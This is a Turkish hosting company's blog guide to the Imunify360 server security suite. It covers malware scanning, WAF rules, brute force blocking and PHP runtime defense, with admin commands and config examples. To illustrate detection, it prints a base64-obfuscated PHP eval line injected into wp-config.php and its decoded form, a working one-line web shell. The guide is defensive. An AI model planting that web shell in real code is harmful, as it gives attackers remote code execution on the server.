Web Hosting & cPanel

    Imunify360 Nedir ve Sunucuyu Nasıl Korur

    Malware taraması, WAF ve brute force korumasını birleştiren Imunify360 güvenlik çözümünü tanıtan rehber.

    12 dk okuma Güncellendi: 10 Temmuz 2026

    Bir paylaşımlı hosting sunucusunda yüzlerce farklı site aynı çekirdeği, aynı PHP havuzunu ve çoğu zaman aynı IP bloğunu paylaşır. Bu ortamda tek bir eski WordPress eklentisi, güncellenmemiş bir tema ya da zayıf bir FTP parolası, yalnızca o siteyi değil komşu hesapları da tehdit eder. Enfekte olan bir dizinden yayılan bir web shell, sunucunun spam göndermesine, IP'nin kara listelere düşmesine ve arama motorlarında "bu site zararlı olabilir" uyarısı çıkmasına kadar giden bir zincir başlatabilir. Klasik yaklaşım, yani "haftada bir antivirüs taraması çalıştır ve umut et" artık yeterli değil; çünkü saldırılar dakikalar içinde otomatik botlarla geliyor.

    Imunify360 tam da bu boşluğu doldurmak için tasarlanmış, CloudLinux ekibinin geliştirdiği çok katmanlı bir sunucu güvenlik paketidir. Tek bir aracın yaptığı işi değil; gerçek zamanlı malware taraması, uygulama seviyesinde bir güvenlik duvarı (WAF), saldırı tespit ve önleme sistemi (IDS/IPS), brute force koruması ve Proactive Defense adı verilen PHP çalışma zamanı savunmasını tek bir yönetim yüzeyinde birleştirir. Bu rehberde Imunify360'ın hangi bileşenlerden oluştuğunu, enfekte olmuş bir WordPress dosyasını nasıl otomatik olarak karantinaya aldığını ve panelden günlük yönetimin nasıl yapıldığını kıdemli bir sistem yöneticisinin gözünden, örneklerle anlatacağım.

    Imunify360 Neden Tek Bir Antivirüsten Farklı#

    Çoğu kişi Imunify360'ı "sunucu antivirüsü" diye özetler ama bu tanım eksik kalır. Geleneksel bir antivirüs imza tabanlı çalışır: bilinen zararlı dosyaların parmak izini bir veritabanında tutar ve tarama sırasında eşleşme arar. Bu yöntem yeni türeyen, obfuscation (karartma) ile gizlenmiş ya da meşru bir dosyanın içine enjekte edilmiş kodlara karşı sıklıkla kör kalır. Imunify360 imza taramasını korurken üzerine makine öğrenmesi tabanlı sezgisel analiz, davranışsal tespit ve bulut tabanlı tehdit istihbaratı ekler.

    Farkı somutlaştırmak için basit bir örnek düşünün. wp-config.php dosyanızın en üstüne base64 ile kodlanmış tek satırlık bir eval() bloğu enjekte edilmiş olsun. İmza tabanlı bir tarayıcı bu dosyayı "WordPress yapılandırması" olarak tanır ve geçebilir. Imunify360'ın sezgisel motoru ise dosyanın içindeki eval(base64_decode(...)) desenini, olağan dışı kod yoğunluğunu ve çalışma zamanı davranışını değerlendirerek bunu zararlı olarak işaretler. Aşağıdaki gibi bir enjeksiyon tipik bir örnektir:

    <?php
    // Meşru wp-config.php içeriğinin üstüne enjekte edilmiş satır
    @eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWyd4J10pKXtldmFsKCRfUE9TVFsneCddKTt9'));
    // Çözülünce: if(isset($_POST['x'])){eval($_POST['x']);} — uzaktan komut çalıştırma
    

    Bu bir web shell'dir; saldırganın POST isteğiyle sunucuda istediği kodu çalıştırmasına izin verir. Imunify360 böyle bir dosyayı yalnızca tespit etmekle kalmaz, temiz halini yeniden inşa etmeye çalışır. Bu proaktif ve iyileştirici yaklaşım, onu pasif bir tarayıcıdan ayıran temel özelliktir. Sunucu güvenliğinin genel prensiplerini derinlemesine merak ediyorsanız sunucu güvenliği temelleri rehberimiz iyi bir zemin oluşturur.

    Gerçek Zamanlı Malware Taraması ve Otomatik Temizleme#

    Imunify360'ın kalbi malware tarama motorudur. İki modda çalışır: on-demand (elle veya zamanlanmış tam tarama) ve real-time (bir dosya diske yazıldığı anda taranması). Real-time koruma, bir eklenti güncellemesi sırasında sunucuya bırakılan zararlı bir dosyayı, o dosya çalıştırılmadan önce yakalamak için kritiktir. Motor, dosya oluşturma ve değiştirme olaylarını izler ve şüpheli içeriği anında incelemeye alır.

    Tespit edilen bir dosyanın akıbeti üç seçenekten biri olabilir: karantinaya alma, otomatik temizleme (cleanup) ya da yalnızca raporlama. Enfekte WordPress çekirdek dosyalarında Imunify360 genellikle otomatik temizlemeyi dener; çünkü çekirdeğin nasıl görünmesi gerektiğini bilir. Örneğin wp-includes/ altındaki bir dosyaya enjekte edilmiş zararlı bloğu çıkarıp dosyanın orijinal, temiz sürümünü geri yazar. Tamamen zararlı, meşru bir karşılığı olmayan dosyalar (örneğin saf bir web shell) ise karantinaya alınır: dosya erişilemez bir konuma taşınır ve zararsız hale getirilir, ama silinmez; böylece yanlış pozitif durumunda geri yükleyebilirsiniz.

    Komut satırından tarama başlatmak ve sonuçları görmek isteyen yöneticiler imunify360-agent aracını kullanır:

    # Belirli bir kullanıcı dizinini elle tara
    imunify360-agent malware on-demand start --path /home/musteri1
    
    # Tarama kuyruğunun durumunu gör
    imunify360-agent malware on-demand status
    
    # Karantinadaki (malicious) dosyaları listele
    imunify360-agent malware malicious list --limit 20
    
    # Yanlış pozitif olduğuna emin olduğun bir dosyayı geri yükle
    imunify360-agent malware malicious restore --id 12345
    

    Zamanlanmış günlük tarama, tespit edilmemiş eski enfeksiyonları yakalamak için önemlidir. Tipik bir yapılandırmada tam tarama gece düşük trafik saatlerinde çalıştırılır ve sonuçlar panele düşer. Aşağıda malware bileşeninin özet yapılandırmasına bir örnek görüyorsunuz:

    MALWARE_SCANNING:
      enable_scan_pureftpd: true      # FTP ile yüklenen dosyaları anında tara
      enable_scan_modsec: true        # Web'den yüklenen dosyaları tara
      try_restore_from_backup_first: true  # Önce yedekten temiz sürümü dene
      rapid_scan: false               # Derin tarama (daha yavaş, daha kapsamlı)
    MALWARE_ACTIONS:
      default_action: "cleanup"       # Varsayılan aksiyon: otomatik temizle
      auto_cleanup: true
    

    WordPress'e özel enfeksiyon senaryoları ve sertleştirme adımları için WordPress güvenliği rehberimizi de öneririm; Imunify360 bir güvenlik ağıdır ama sitenizi baştan sağlam kurmanın yerini tutmaz.

    Web Application Firewall (WAF) ve ModSecurity Kuralları#

    Malware taraması olayı gerçekleştikten sonra devreye girer; WAF ise saldırıyı daha ağa girerken durdurmayı hedefler. Imunify360'ın WAF katmanı ModSecurity üzerine kurulur ve CloudLinux'un sürekli güncellediği özel kural setiyle beslenir. Bu kurallar SQL injection, XSS, uzaktan dosya çağırma (RFI/LFI), komut enjeksiyonu ve bilinen CMS açıklarına yönelik sömürü girişimlerini HTTP isteği seviyesinde yakalar.

    Örneğin, bir saldırgan WordPress'in eski bir eklentisindeki dosya yükleme açığını sömürmeye çalışırken WAF, isteğin gövdesindeki tipik web shell imzalarını ve anormal parametre desenlerini görüp isteği daha PHP'ye ulaşmadan reddeder. Bunun avantajı, eklenti henüz yamalanmamış olsa bile "virtual patching" (sanal yama) sayesinde açığın istismar edilememesidir. Standart bir WHM/cPanel ortamında WAF kurallarının durumunu şöyle kontrol edebilirsiniz:

    # Aktif WAF kural setlerini listele
    imunify360-agent config show | grep -A5 WAF
    
    # ModSecurity'nin engellediği son olayları gör
    imunify360-agent get-module-status
    

    WAF çift yönlü çalışır: gelen isteği filtrelediği gibi, sunucudan dışarı giden şüpheli davranışı da izler. Bir hesap aniden bilinen komut-kontrol (C2) sunucularına bağlanmaya başlarsa bu, halihazırda enfekte olmuş bir sitenin işareti olabilir ve sistem bunu işaretler. WAF katmanını bir de sunucu önündeki WAF hizmetimiz ve DDoS koruma çözümleriyle birlikte düşündüğünüzde, uygulama katmanından ağ katmanına uzanan derinlemesine savunma elde edersiniz.

    Aşağıdaki tablo, WAF'ın hangi saldırı türünü hangi mekanizmayla ele aldığını özetliyor:

    Saldırı TürüWAF MekanizmasıTipik Sonuç
    SQL InjectionParametre deseni + payload analiziİstek 403 ile reddedilir
    XSS (Cross-Site Scripting)Script/etiket enjeksiyon tespitiZararlı gövde temizlenir/bloklanır
    RFI/LFIDosya yolu ve URL çağrı denetimiUzak dosya çağrısı engellenir
    Bilinen CMS açığıSanal yama (virtual patching)Açık, yama gelene dek kapalı tutulur
    Web shell yüklemeYük içeriği imza denetimiYükleme isteği durdurulur

    Brute Force Koruması ve IDS/IPS#

    Paylaşımlı sunuculara yönelik saldırıların büyük kısmı zekice bir açık istismarı değil, kaba kuvvetle parola denemesidir. Botlar; cPanel, WordPress wp-login.php, FTP, POP3/IMAP ve SSH gibi giriş noktalarına saniyeler içinde binlerce parola dener. Imunify360'ın brute force koruması bu denemeleri servis loglarından gerçek zamanlı okur ve eşiği aşan IP adreslerini otomatik olarak engeller.

    Engelleme kalıcı bir "kara liste" mantığından ziyade akıllı bir grı-liste (greylist) sistemiyle yönetilir. Şüpheli ama kesin zararlı olmayan bir IP tamamen kapatılmak yerine CAPTCHA'lı bir doğrulama sayfasına yönlendirilebilir; böylece gerçek bir kullanıcı yanlışlıkla engellenmişse kendini doğrulayıp devam edebilir, bot ise takılır. Bu, özellikle mobil kullanıcıların dinamik IP'leri paylaştığı ortamlarda yanlış pozitif kaynaklı destek taleplerini ciddi ölçüde azaltır.

    IDS/IPS (Intrusion Detection/Prevention System) katmanı ise tekil giriş denemelerinin ötesine bakar; sunucu genelindeki desenleri korele eder. Aynı /24 ağından gelen dağıtık denemeleri, kısa sürede birçok farklı hesaba yönelen tarama davranışını ya da bilinen zararlı IP itibar listelerindeki adresleri tespit edip proaktif olarak bloklar. Engelleri komut satırından şöyle inceleyebilir ve yönetebilirsiniz:

    # Anlık olarak engellenmiş IP adreslerini listele
    imunify360-agent ip-list local --list-type black
    
    # Bir IP'yi kalıcı beyaz listeye al (örn. ofis sabit IP'si)
    imunify360-agent whitelist ip 203.0.113.45 --comment "Ofis statik IP"
    
    # Yanlışlıkla engellenmiş bir IP'yi serbest bırak
    imunify360-agent ip-list delete --ip 198.51.100.10 --list-type black
    

    Sık takılan meşru bir IP varsa (örneğin bir ödeme sağlayıcısının webhook sunucusu ya da bir izleme servisi) onu beyaz listeye eklemek doğru yaklaşımdır. SSH erişiminizi ayrıca anahtar tabanlı kimlik doğrulama ve parola girişini kapatmayla sertleştirmeyi de ihmal etmeyin; brute force koruması bir kalkandır ama zayıf yapılandırmanın mazereti değildir.

    Proactive Defense — PHP Çalışma Zamanı Savunması#

    Imunify360'ın en ayırt edici bileşeni Proactive Defense'tir. Malware taraması dosyayı diskte inceler; Proactive Defense ise bir PHP betiği çalışırken ne yaptığını gerçek zamanlı izler. Bir PHP uzantısı olarak çekirdeğe bağlanır ve zararlı davranış kalıplarını çalışma anında yakalar. Böylece diske hiç yazılmadan, doğrudan bellekte çalışan (fileless) enjeksiyonları bile durdurabilir.

    Örneğin bir betik, gelen POST verisini alıp system(), exec() ya da passthru() ile kabuk komutu çalıştırmaya kalkarsa; ya da /etc/passwd gibi hassas dosyaları okumaya, sunucudan tanımlanmamış dış adreslere bağlantı açmaya çalışırsa Proactive Defense bu davranışı riskli olarak sınıflandırır. Üç çalışma modu vardır: log only (yalnızca kaydet), kill mode (zararlı betiği anında sonlandır) ve disabled. Üretim ortamında genellikle kill mode önerilir, ama yeni bir siteyi devreye alırken önce log-only ile birkaç gün gözlem yapıp yanlış pozitifleri kalibre etmek sağlıklı bir yaklaşımdır.

    ; Proactive Defense yapılandırma örneği
    [PROACTIVE_DEFENCE]
    mode = kill                 ; log | kill | disabled
    php_immunity = true         ; Bilinen tehlikeli PHP fonksiyonlarını izle
    

    Bu davranışsal katman, imza tabanlı savunmanın kör noktasını kapatır. Sıfırıncı gün (zero-day) bir açık henüz kimse tarafından imzalanmamışken bile, açığın sömürüldüğü an sergilenen davranış (beklenmedik komut çalıştırma, yetkisiz dosya erişimi) yakalanabilir. Proactive Defense'i düşük seviyeli bir "davranış bekçisi" olarak düşünebilirsiniz; ne çalıştığını değil, çalışanın ne yapmaya kalktığını denetler.

    Panelden Günlük Yönetim ve Bildirimler#

    Imunify360'ın gücünün büyük kısmı, tüm bu katmanları tek bir arayüzde toplamasından gelir. cPanel/WHM, DirectAdmin ya da Plesk gibi kontrol panellerine entegre olan bir eklenti sunar. Sunucu yöneticisi WHM tarafındaki tam yönetim panelinden bütün hesapların güvenlik durumunu görürken, son kullanıcı kendi cPanel hesabında yalnızca kendi sitesine ait tarama sonuçlarını, karantinaya alınmış dosyaları ve engellenen IP'leri görebilir.

    Tipik bir günlük yönetim akışı şöyle işler: sabah panele giriş yaparsınız, gece çalışan tam taramanın özetini ve son 24 saatteki güvenlik olaylarını görürsünüz. Malware sekmesinde tespit edilen dosyaları, hangi hesaba ait olduklarını ve alınan aksiyonu (temizlendi / karantinada / raporlandı) incelersiniz. Bir dosyanın yanlış pozitif olduğuna kanaat getirirseniz tek tıkla geri yükler ve gerekiyorsa o deseni beyaz listeye ekleyerek tekrarını önlersiniz. Kritik olaylar (bir hesabın kitlesel enfeksiyonu, tekrarlayan saldırı) için e-posta bildirimlerini yapılandırmak, sorunları müşteriden önce fark etmenizi sağlar.

    Aşağıdaki tablo, sunucu yöneticisi ile son kullanıcının panelde gördükleri arasındaki farkı özetliyor:

    YetenekSunucu Yöneticisi (WHM)Son Kullanıcı (cPanel)
    Tüm hesapları görmeEvetHayır (yalnızca kendi hesabı)
    Tarama başlatmaSunucu geneli + hesap bazlıKendi dizini için
    Karantina yönetimiTüm dosyalarKendi dosyaları
    WAF/IPS kurallarıDüzenleyebilirGörüntüleme yok
    Beyaz/kara listeGlobal yönetimSınırlı/yok

    Bu katmanlı görünürlük, hosting sağlayıcısı için hem operasyonel verimlilik hem de müşteri güveni anlamına gelir. Müşteri kendi güvenlik durumunu şeffaf biçimde görebildiğinde, "sitem neden yavaşladı, neden uyarı aldım" tarzı destek taleplerinin çoğu daha başlamadan çözülür. Sunucu tarafında bu katmanları profesyonelce işleten bir ekiple çalışmak isterseniz sunucu yönetimi hizmetimiz devreye girer.

    Imunify360 Kimler İçin ve Nerede Konumlanır#

    Imunify360 en çok değeri, birden fazla siteyi barındıran paylaşımlı ve reseller ortamlarında üretir; çünkü bir hesaptaki enfeksiyonun diğerlerine sıçramasını engellemek tam olarak onun uzmanlık alanıdır. Tek bir kurumsal siteyi kendi ayrılmış sunucusunda çalıştıran bir işletme için de değerlidir, ama orada güvenlik stratejisi genellikle daha fazla elle sertleştirme ve özelleştirilmiş kural setiyle tamamlanır.

    Şunu net söylemek gerekir: hiçbir güvenlik ürünü tek başına "kur ve unut" değildir. Imunify360'ı güçlü bir güvenlik ağı olarak görün; onu düzenli güncellemeler, güçlü parolalar, en az yetki prensibi ve sağlam bir yedekleme stratejisiyle birlikte kullandığınızda gerçek anlamda dayanıklı bir sistem elde edersiniz. Bir enfeksiyon en kötü senaryoda bile temiz bir yedekten hızlı dönüş yapabilmenizle telafi edilir; bu yüzden yedekleme ve güvenlik birbirini tamamlar, birbirinin yerine geçmez.

    Imunify360'ı diğer yaygın seçeneklerle kıyaslayan kısa bir çerçeve şöyle görünür:

    ÖzellikImunify360Klasik AntivirüsSalt WAF
    Gerçek zamanlı malware taramaVarKısmiYok
    Otomatik temizlemeVarNadirenYok
    WAF / sanal yamaVarYokVar
    Brute force korumasıVarYokKısmi
    PHP davranış izlemeVar (Proactive Defense)YokYok
    Panel entegrasyonuVar (cPanel/DA/Plesk)DeğişkenDeğişken

    Kendi WordPress veya web hosting paketinizi güçlü bir güvenlik altyapısıyla almak istiyorsanız web hosting ve WordPress hosting paketlerimize göz atabilirsiniz; birden çok müşteri sitesi yönetiyorsanız reseller hosting tarafı sizin için daha uygun olacaktır.

    Sıkça Sorulan Sorular#

    Imunify360 sitemi yavaşlatır mı?#

    Genel olarak hayır, çünkü tarama ve izleme bileşenleri kaynak kullanımını sınırlayacak şekilde tasarlanmıştır ve yoğun taramalar düşük trafik saatlerine zamanlanır. Real-time koruma dosya yazma olaylarını izler, her istekte ağır bir işlem çalıştırmaz; dolayısıyla iyi yapılandırılmış bir sunucuda son kullanıcı fark edilir bir yavaşlama yaşamaz. Aşırı düşük kaynaklı ortamlarda tarama yoğunluğunu ve zamanlamasını ayarlayarak dengeyi optimize edebilirsiniz.

    Enfekte olmuş dosyalarımı gerçekten otomatik temizliyor mu?#

    Evet, özellikle WordPress çekirdek dosyaları ve yaygın CMS dosyaları için otomatik temizleme oldukça başarılıdır çünkü sistem dosyanın temiz halini bilir ve enjekte edilmiş zararlı bloğu çıkarıp orijinali geri yazar. Ancak tamamen zararlı, meşru karşılığı olmayan dosyalar (örneğin saf web shell'ler) temizlenmek yerine karantinaya alınır. Her durumda dosyalar silinmeden erişilemez hale getirildiği için yanlış pozitif olması halinde tek tıkla geri yükleme yapabilirsiniz.

    Imunify360 yerine ücretsiz bir tarayıcı kullansam olmaz mı?#

    Ücretsiz araçlar (örneğin açık kaynak tarayıcılar) belirli imzaları yakalayabilir ama Imunify360'ın sunduğu real-time koruma, WAF, brute force savunması ve PHP davranış izlemesini tek pakette bulamazsınız. Ücretsiz bir tarayıcı olaydan sonra tespit yaparken, Imunify360 saldırıyı gerçekleşmeden durdurmaya ve gerçekleştikten sonra iyileştirmeye odaklanır. Birden fazla siteyi barındıran ortamlarda bu proaktif ve katmanlı yaklaşım fark yaratır.

    Yanlışlıkla temiz bir dosyam karantinaya alınırsa ne yaparım?#

    Panelden ilgili dosyayı bulup tek tıkla geri yükleyebilir, ardından o deseni beyaz listeye ekleyerek tekrar işaretlenmesini önleyebilirsiniz. Komut satırından çalışıyorsanız imunify360-agent malware malicious restore --id <ID> komutu dosyayı orijinal konumuna geri koyar. Yanlış pozitiflerin çoğu özel yazılmış veya sıra dışı kodlanmış meşru betiklerde görülür; bu durumları beyaz listeyle yönetmek en temiz çözümdür.

    Imunify360 güvenlik güncellemelerimi yapmaktan beni kurtarır mı?#

    Hayır, ve bunu net anlamak önemli. Imunify360 güncellenmemiş bir eklentideki açığı sanal yama ile bir süre koruyabilir, ama bu geçici bir kalkandır; asıl çözüm eklenti, tema ve çekirdek güncellemelerini düzenli yapmaktır. Güvenliği bir bütün olarak düşünün: Imunify360 güvenlik ağı, düzenli güncellemeler zeminin sağlamlığı ve yedekleme de son çare kurtarma planınızdır. Bu üçü birlikte çalıştığında dayanıklı bir sistem elde edersiniz.

    Kapanış#

    Imunify360, paylaşımlı ve yoğun kullanılan hosting ortamlarında güvenliği tek tek araçlarla kovalamak yerine bütünsel bir çözüme kavuşturur. Gerçek zamanlı malware taraması ve otomatik temizleme, uygulama katmanında WAF, brute force koruması, IDS/IPS ve çalışma zamanında davranışı denetleyen Proactive Defense; hepsi tek bir panelde birleşerek hem sunucu yöneticisine hem son kullanıcıya net bir görünürlük ve gerçek bir savunma sunar. Ama en iyi güvenlik ürünü bile disiplinli güncelleme, güçlü parola politikası ve sağlam yedeklemeyle tamamlandığında anlam kazanır.

    Clou.TR olarak hosting altyapımızı bu katmanlı güvenlik anlayışıyla kurguluyoruz. Sitenizi güçlü bir koruma zemininde başlatmak için web hosting ve WordPress hosting paketlerimizi inceleyebilir, daha fazla kaynak ve kontrol isterseniz VDS sunucularımıza göz atabilirsiniz. Sürekli bakım ve izleme için WordPress bakım ve sunucu yönetimi hizmetlerimiz de yanınızda. Sorularınız için ekibimize her zaman ulaşabilir, sitenizi ilk günden itibaren güvende tutabilirsiniz.

    HostingGüvenlik

    Uygulamaya geçmeye hazır mısınız?

    NVMe SSD, ücretsiz SSL ve %99.9 uptime garantisiyle Clou.TR hosting ve sunucu çözümleriyle projenizi hayata geçirin.